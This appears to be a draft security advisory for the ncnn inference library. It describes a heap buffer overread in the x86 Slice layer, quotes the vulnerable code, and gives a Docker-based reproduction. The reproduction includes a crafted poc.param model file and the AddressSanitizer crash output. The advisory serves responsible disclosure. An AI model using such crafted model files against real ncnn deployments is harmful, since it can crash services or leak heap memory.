All advisories
Draft

Heap Buffer Overread in X86 Slice

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overread in X86 Slice

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/slice_x86.cpp:93 in Slice_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

The x86 Slice layer uses the per-output lengths from parameter 0 without checking them against the input width: it allocates each output from the declared length and copies that many bytes from a running offset into the source tensor. A model whose 1-D input is 8 elements wide but whose slice list is -23300=2,8,32 makes the second copy read 128 bytes starting 32 bytes into a 32-byte tensor. ncnnoptimize performs this copy while running ModelWriter::shape_inference() over the attacker-supplied .param.

Detail

Slice::load_param stores the length array verbatim as slices = pd.get(0, Mat());. In the 1-D branch of the x86 implementation, each entry is read into slice, the output is created from it, and q is advanced by it — the only value ever compared against w is the -233 "divide the remainder" sentinel, and q + slice > w is never detected.

// src/layer/x86/slice_x86.cpp:41
    if (dims == 1) // positive_axis == 0
    {
        // slice vector
        int w = bottom_blob.w * elempack;
        int q = 0;
        for (size_t i = 0; i < top_blobs.size(); i++)
        {

// src/layer/x86/slice_x86.cpp:84
            size_t out_elemsize = elemsize / elempack * out_elempack;

            Mat& top_blob = top_blobs[i];
            top_blob.create(slice / out_elempack, out_elemsize, out_elempack, opt.blob_allocator);
            if (top_blob.empty())
                return -100;

            const float* ptr = (const float*)bottom_blob + q;
            float* outptr = top_blob;
            memcpy(outptr, ptr, top_blob.w * top_blob.elemsize);

            q += slice;

The copy length is derived entirely from the declared slice — top_blob.w * top_blob.elemsize is (slice / out_elempack) * (elemsize / elempack * out_elempack), which is just slice * 4 bytes — while the source pointer is bottom_blob + q, with q accumulated from the earlier declared slices.

The PoC declares an 8-element Input and -23300=2,8,32. The first output takes slice = 8, selects out_elempack = 8, and copies 32 bytes from offset 0 — in range — leaving q = 8. The second takes slice = 32, selects out_elempack = 16 and out_elemsize = 64, creates a w = 2 output, and copies 2 * 64 = 128 bytes from bottom_blob + 8 floats. The input Mat was created by shape inference as Mat::create(8, 4u): a 32-byte payload, 100 bytes with the refcount and the 64-byte NCNN_MALLOC_OVERREAD pad. The copy therefore runs from byte 32 to byte 160 and ASan flags it at byte 100, the end of the allocation. A larger declared slice length reads correspondingly further into unrelated heap memory and copies it into an output blob.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overread-in-x86-slice && cd ncnn-poc-heap-buffer-overread-in-x86-slice

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
2 3
Input data 0 1 data 0=8
Slice slice 1 2 data out0 out1 -23300=2,8,32
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5100000000a4 at pc 0x76430365342e bp 0x7ffdfb01da50 sp 0x7ffdfb01d1f8
READ of size 128 at 0x5100000000a4 thread T0
    #0 0x76430365342d in memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115
    #1 0x5b3d001bca88 in ncnn::Slice_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/slice_x86_avx512.cpp:93
    #2 0x5b3cfc78470b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #3 0x5b3cfc76cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x5b3cfc7cc9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x5b3cfc65e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #6 0x5b3cfc6dbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #7 0x764302fdb1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x764302fdb28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x5b3cfc65b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x5100000000a4 is located 0 bytes after 100-byte region [0x510000000040,0x5100000000a4)
allocated by thread T0 here:
    #0 0x764303654f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5b3cfc72abc5 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5b3cfc72abc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
    #3 0x5b3cfc65cc3b in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:388
    #4 0x5b3cfc6dbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #5 0x764302fdb1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #6 0x764302fdb28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x5b3cfc65b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115 in memcpy

Credit

Zheng Yu @ DepthFirst